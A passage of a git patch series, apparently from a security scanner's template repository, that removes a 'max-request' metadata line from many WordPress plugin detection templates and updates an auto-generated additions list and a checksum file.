woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 54dce49b42..1d41b4ec2c 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 2ead906817..8bdc600063 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From 7977de0e5d0c247a76fd975066ea88332eb9cd82 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 30 Jun 2023 05:08:40 +0000 Subject: [PATCH 196/609] Auto Generated New Template Addition List [Fri Jun 30 05:08:40 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8ea0714038..4068aa5366 100644 --- a/.new-additions +++ b/.new-additions @@ -26,6 +26,7 @@ http/cves/2023/CVE-2023-34843.yaml http/cves/2023/CVE-2023-35843.yaml http/cves/2023/CVE-2023-35844.yaml http/exposed-panels/axxon-client-panel.yaml +http/exposed-panels/jsherp-boot-panel.yaml http/exposed-panels/openbullet2-panel.yaml http/exposed-panels/syncserver-panel.yaml http/exposed-panels/wd-mycloud-panel.yaml From f2d5a71887e143693e465cc54dd33f686732caf4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 30 Jun 2023 05:09:04 +0000 Subject: [PATCH 197/609] Auto Generated Templates Checksum [Fri Jun 30 05:09:04 UTC 2023] :robot: --- templates-checksum.txt | 424 ++++++++++++++++++++--------------------- 1 file changed, 212 insertions(+), 212 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index e2751cedd6..003671d7e3 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -210,18 +210,18 @@ helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt:2f42d9eff165ff903900a0f helpers/wordpress/plugins/cloudflare.txt:90e21e6589c03430b25fc4c525c14a0d6aff8619 helpers/wordpress/plugins/cmb2.txt:12291cb9150686dd1175c2a1662b9d1acd8b9b62 helpers/wordpress/plugins/coblocks.txt:513cc2cbdbaafc4b88110a8732fa6d6886d54ff5 -helpers/wordpress/plugins/code-snippets.txt:1ee09476b338ca8261ad83be6aefa18693436588 +helpers/wordpress/plugins/code-snippets.txt:42aae5955584904bc2d13eabc3cf07107b276398 helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/complianz-gdpr.txt:e34cf029ebf2ac799f0bb13727fc79e76b2e5ecb helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/contact-form-7.txt:aa016b2fe9e1d5ec44a206b16f237f748a306395 helpers/wordpress/plugins/contact-form-cfdb7.txt:0d092b3544a1eeaa4d69abaaa6d6e4f15660efbe -helpers/wordpress/plugins/cookie-law-info.txt:c6212c846c6e95fc013ab95065fc2982e4f963ce +helpers/wordpress/plugins/cookie-law-info.txt:8b06ddb10d32fd00c6f396f4696592af976b2118 helpers/wordpress/plugins/cookie-notice.txt:8599c5904510bf3031da09a62f0802bc300e964e helpers/wordpress/plugins/creame-whatsapp-me.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/creative-mail-by-constant-contact.txt:5c09cf3589e93781df4d59ed6b5a5d6207e2929c helpers/wordpress/plugins/custom-css-js.txt:40c77b21aca06ae8ad4f43edd798f21a5571e995 -helpers/wordpress/plugins/custom-fonts.txt:f7ca6a21d278eb5ce64611aadbdb77ef1511d3dd +helpers/wordpress/plugins/custom-fonts.txt:9ff4120c2315a5db674958e00529bc95c08b0e76 helpers/wordpress/plugins/custom-post-type-ui.txt:98f8ee0eb7f9c0946fc02d5aafdb333ea0c45513 helpers/wordpress/plugins/disable-comments.txt:8f52888ff7e35fd5ca310231fa076be1206b49bd helpers/wordpress/plugins/disable-gutenberg.txt:01fa77eedfbdd7455e8cf0cf239a4deb3041acfd @@ -238,20 +238,20 @@ helpers/wordpress/plugins/elementskit-lite.txt:fd7189809f10f8d048cceae8bfbc391d3 helpers/wordpress/plugins/enable-media-replace.txt:36442478f1f952d62cb89e1b634d5937a7d2863f helpers/wordpress/plugins/envato-elements.txt:fefed34c88a4926b37d965db8c15fed2727796a6 helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt:e3b1c874b07e920f5092b34238b539c29b1e3578 -helpers/wordpress/plugins/ewww-image-optimizer.txt:5d513daaf4f135a042bb74f1e333818f565d38a5 +helpers/wordpress/plugins/ewww-image-optimizer.txt:47c3ed69e5609d2452fff4d1fa775f2f0aaa7d4c helpers/wordpress/plugins/facebook-for-woocommerce.txt:7426d695a30092738382fce59a78dd77be5bfc39 helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614 helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/flamingo.txt:98a16af997b52cb888232ab5d79a527b0716561c -helpers/wordpress/plugins/fluentform.txt:47c239e673f9107a350a65011f0487d5853dd570 +helpers/wordpress/plugins/fluentform.txt:a832235a17d232a9abf36075ae469dee7e69ff3d helpers/wordpress/plugins/font-awesome.txt:f4bf33bfd9c3793655f2a19fca0ee1ca41e62e6e helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb8227230edc41ff2ca6557e1 helpers/wordpress/plugins/formidable.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6 helpers/wordpress/plugins/forminator.txt:bbaf47909306821eec059ce49a6349fa542bdd17 helpers/wordpress/plugins/ga-google-analytics.txt:361f82e0e4329314b5ec0ac3b14d43cb15fc0c02 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:b51e37a1939bf22a226cba6aa16aa556b5bdfdf3 -helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:b7d50d26d51d5289bf585b732f6c3461afbc0f33 -helpers/wordpress/plugins/google-analytics-for-wordpress.txt:960d705f853a527286d48b8812809f77af7e535b +helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:6b474cdaf13fc941946668ffea3b8a5047fc2c73 +helpers/wordpress/plugins/google-analytics-for-wordpress.txt:efa2314fd79dfeb6c6a4f1283847a5e31dbed204 helpers/wordpress/plugins/google-listings-and-ads.txt:6b67ce6c1930ff8e1d5003aeb8218f8fbdd4e6d2 helpers/wordpress/plugins/google-site-kit.txt:36783a832f727ead000f1bce63fd4a599fded929 helpers/wordpress/plugins/google-sitemap-generator.txt:9a1ae806a7c678b6c9b4895b016033f980c1bf10 @@ -291,7 +291,7 @@ helpers/wordpress/plugins/megamenu.txt:403a4300e5939d1d7fbfb90958aac5b413468ba3 helpers/wordpress/plugins/members.txt:f94488dae421ac2a8aae98632f63a2647ef07e43 helpers/wordpress/plugins/meta-box.txt:8a4874fdff1ab036389b4739f479332aa0c63551 helpers/wordpress/plugins/ml-slider.txt:d95eb74054f74c17f26d8fb9735af553bddddade -helpers/wordpress/plugins/newsletter.txt:66bbc13ad9e3147893b990ab1a35d08623caab2a +helpers/wordpress/plugins/newsletter.txt:abdb334b7c43837f64108a70a2a66817e130b80c helpers/wordpress/plugins/nextend-facebook-connect.txt:deccc3cf363403cddb880388388bf192fbcfd655 helpers/wordpress/plugins/nextgen-gallery.txt:9144c432d473baecd93eb0985d3874cf3bb6a126 helpers/wordpress/plugins/ninja-forms.txt:b1fa250248667d473f40086fa4a2cd4645e99d0f @@ -315,7 +315,7 @@ helpers/wordpress/plugins/pretty-link.txt:fbc954f986ea78ee55f14e1ee288f60983e46f helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/really-simple-ssl.txt:cfb1a020caaeba8b61a9e907652aed3d696c8ce9 helpers/wordpress/plugins/redirection.txt:392ee3765c26f4ca0b6935f9bb0f006c2354af12 -helpers/wordpress/plugins/redux-framework.txt:6328e55f0b8c991dca9b1bed7c3b0763f63cd1bf +helpers/wordpress/plugins/redux-framework.txt:68a50e98458a9c28886ed15ffb2cc666b2d3d49b helpers/wordpress/plugins/regenerate-thumbnails.txt:d1fd48333115227b181b4b132e5511e91d95bea5 helpers/wordpress/plugins/safe-svg.txt:d24fa45ca77f079cc359c97272276969e6aead2c helpers/wordpress/plugins/seo-by-rank-math.txt:aa66ca91043cb47f7b1ca18775c6c15b64833ecf @@ -356,7 +356,7 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:57f75e869bf26cdb7ead helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:9c381dd6bbe0788e8717d7adc6b2f8b8d3687aaa -helpers/wordpress/plugins/woocommerce-payments.txt:8c239f4b13876e71581f4f887e97f26506143793 +helpers/wordpress/plugins/woocommerce-payments.txt:eecaf8be5654f259a19f021dd696c8aed0425326 helpers/wordpress/plugins/woocommerce-paypal-payments.txt:d1325bb186bd83303245e504f7c6eceae7f19e44 helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:d2c7dc39f7a599e653154733c2f9c606bee5474c helpers/wordpress/plugins/woocommerce-services.txt:5da596d45f9d6516efc24f110a7c87475a984016 @@ -4133,7 +4133,7 @@ http/misconfiguration/prometheus/prometheus-flags.yaml:8fd4a885790d3ed82dc12de3f http/misconfiguration/prometheus/prometheus-log.yaml:644a43bf1feaa9733bdcd756b60ec9e2aa3806b7 http/misconfiguration/prometheus/prometheus-targets.yaml:f0916980c60f56c283147404674599ee79ae27d8 http/misconfiguration/proxy/metadata-alibaba.yaml:ba1dd0862f0b2b6bca8e88ce724fcb64ab1f7911 -http/misconfiguration/proxy/metadata-aws.yaml:b032d2cf6f09532106bde587d66c077c950498a1 +http/misconfiguration/proxy/metadata-aws.yaml:1b858b4fefb26bd43b06bd2b076d8b320243c629 http/misconfiguration/proxy/metadata-azure.yaml:b7651276f7a1316b7e9ee10d1977e61bdc26a9a0 http/misconfiguration/proxy/metadata-digitalocean.yaml:41276b057ad56ad2eeb95acd02ed58e0c7fc6a1b http/misconfiguration/proxy/metadata-google.yaml:f3ce729384eba1a220c57a7b133254fb9a0424b2 @@ -5320,213 +5320,213 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 